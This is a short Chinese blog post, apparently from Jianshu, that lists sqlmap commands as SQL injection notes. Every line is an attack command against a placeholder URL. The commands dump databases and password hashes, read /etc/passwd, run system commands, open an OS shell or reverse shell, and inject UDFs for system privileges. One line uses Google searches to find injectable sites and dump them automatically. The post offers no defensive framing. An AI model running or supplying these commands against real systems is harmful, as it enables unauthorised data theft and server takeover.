Web安全

Sqlmap笔记补充

2017-03-29  本文已影响80人  简书这个地方快倒闭了

1.基础信息

python sqlmap/sqlmap.py -u"http://url/news?id=1"--current-user #获取当前用户名称

python sqlmap/sqlmap.py -u"http://www.xxoo.com/news?id=1"--current-db #获取当前数据库名称

python sqlmap/sqlmap.py-u"http://www.xxoo.com/news?id=1"--tables -D"db_name"#列表名

python sqlmap/sqlmap.py-u"http://url/news?id=1"--columns -T"tablename"users-D"db_name"-v0#列字段

python sqlmap/sqlmap.py-u"http://url/news?id=1"--dump -C"column_name"-T"table_name"-D"db_name"-v0#获取字段内容

2.信息内容

python sqlmap/sqlmap.py -u"http://url/news?id=1"--smart  --level3--users  # smart智能 level  执行测试等级python sqlmap/sqlmap.py -u"http://url/news?id=1"--dbms"Mysql"--users  # dbms 指定数据库类型

python sqlmap/sqlmap.py -u"http://url/news?id=1"--users  #列数据库用户

python sqlmap/sqlmap.py -u"http://url/news?id=1"--dbs#列数据库

python sqlmap/sqlmap.py -u"http://url/news?id=1"--passwords #数据库用户密码

python sqlmap/sqlmap.py -u"http://url/news?id=1"--passwords-U root  -v0#列出指定用户数据库密码

python sqlmap/sqlmap.py -u"http://url/news?id=1"--dump -C"password,user,id"-T"tablename"-D"db_name"--start1--stop20#列出指定字段,列出20条

python sqlmap/sqlmap.py -u"http://url/news?id=1"--dump-all -v0#列出所有数据库所有表

python sqlmap/sqlmap.py -u"http://url/news?id=1"--privileges #查看权限

python sqlmap/sqlmap.py -u"http://url/news?id=1"--privileges -U root #查看指定用户权限

python sqlmap/sqlmap.py -u"http://url/news?id=1"--is-dba -v1#是否是数据库管理员

python sqlmap/sqlmap.py -u"http://url/news?id=1"--roles #枚举数据库用户角色

python sqlmap/sqlmap.py -u"http://url/news?id=1"--udf-inject #导入用户自定义函数(获取系统权限!)

python sqlmap/sqlmap.py -u"http://url/news?id=1"--dump-all --exclude-sysdbs -v0#列出当前库所有表

python sqlmap/sqlmap.py -u"http://url/news?id=1"--union-cols #union 查询表记录

python sqlmap/sqlmap.py -u"http://url/news?id=1"--cookie"COOKIE_VALUE"#cookie注入

python sqlmap/sqlmap.py -u"http://url/news?id=1"-b #获取banner信息

python sqlmap/sqlmap.py -u"http://url/news?id=1"--data"id=3"#post注入

python sqlmap/sqlmap.py -u"http://url/news?id=1"-v1-f #指纹判别数据库类型

python sqlmap/sqlmap.py -u"http://url/news?id=1"--proxy"http://127.0.0.1:8118"#代理注入

python sqlmap/sqlmap.py -u"http://url/news?id=1"--string"STRING_ON_TRUE_PAGE"#指定关键词

python sqlmap/sqlmap.py -u"http://url/news?id=1"--sql-shell #执行指定sql命令

python sqlmap/sqlmap.py -u"http://url/news?id=1"--file /etc/passwd

python sqlmap/sqlmap.py -u"http://url/news?id=1"--os-cmd=whoami #执行系统命令python sqlmap/sqlmap.py -u"http://url/news?id=1"--os-shell #系统交互shell

python sqlmap/sqlmap.py -u"http://url/news?id=1"--os-pwn #反弹shell

python sqlmap/sqlmap.py -u"http://url/news?id=1"--reg-read #读取win系统注册表

python sqlmap/sqlmap.py -u"http://url/news?id=1"--dbs-o"sqlmap.log"#保存进度

python sqlmap/sqlmap.py -u"http://url/news?id=1"--dbs  -o"sqlmap.log"--resume  #恢复已保存进度sqlmap -g"google语法"--dump-all --batch  #google搜索注入点自动 跑出所有字段攻击实例

python sqlmap/sqlmap.py -u"http://url/news?id=1&Submit=Submit"--cookie="PHPSESSID=41aa833e6d0d28f489ff1ab5a7531406"--string="Surname"--dbms=mysql --users --password

上一篇下一篇

猜你喜欢

热点阅读